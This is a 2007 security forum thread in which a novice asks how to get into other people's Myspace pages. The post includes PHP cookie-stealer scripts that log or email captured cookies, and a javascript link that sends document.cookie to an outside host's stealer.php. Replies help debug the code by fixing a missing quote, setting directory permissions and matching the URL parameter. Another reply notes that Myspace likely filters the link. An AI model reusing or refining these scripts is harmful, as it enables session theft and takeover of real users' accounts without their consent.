Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Accessing a Myspace Page
Posted by: nemohotatse
Date: February 10, 2007 06:13PM

Forgive me in advance, because I'm a complete nooby. I know enough html to get around some basic coding, but I know absolutely nothing about much else, though I do enjoy learning new things.

I've been researching how to create a cookie stealer. From what I've read on other sites, they seem to commonly use this coding...

<?php
$cookie = $_GET['c];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");;
$referer=getenv ('HTTP_REFERER');
$fp = fopen('cookies.txt', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Referer: '.$referer.'<br><br><br>');
fclose($fp);
header ("Location: /picture.html");
?>

<?php
$cookie = $HTTP_GET_VARS["cookie"];
mail("me@mydomain.com", "Cookie stealer report", $cookie);
?>

<a href="javascript:document.location='http://www.host.com/mysite/stealer.php?cookie='+document.cookie;">Click here!</a>


However, I can't seem to get it to work.

Does anyone know of another way to access a users Myspace page that might be a bit more FNG friendly?

Options: ReplyQuote
Re: Accessing a Myspace Page
Posted by: bubbles
Date: February 10, 2007 07:21PM

<a href="javascript:document.location='http://www.host.com/mysite/stealer.php?cookie='+document.cookie;">Click here!</a>

Is probably filtered in some way shape or form on myspace...

-bubbles
http://webmastertutorials.net

Options: ReplyQuote
Re: Accessing a Myspace Page
Posted by: Luny
Date: February 10, 2007 10:46PM

in the first script
$cookie = $_GET['c];

a ' is missing. You should get a error tho unless you have php_flag display_errors off

make sure the dir its writing the cookie into is chmoded correctly if you plan on using that first script and make sure your var in the url is c= and not cookie=

---------------
Digital footprints suck. Learn to walk on your hands.
http://www.youfucktard.com

Options: ReplyQuote


Sorry, only registered users may post in this forum.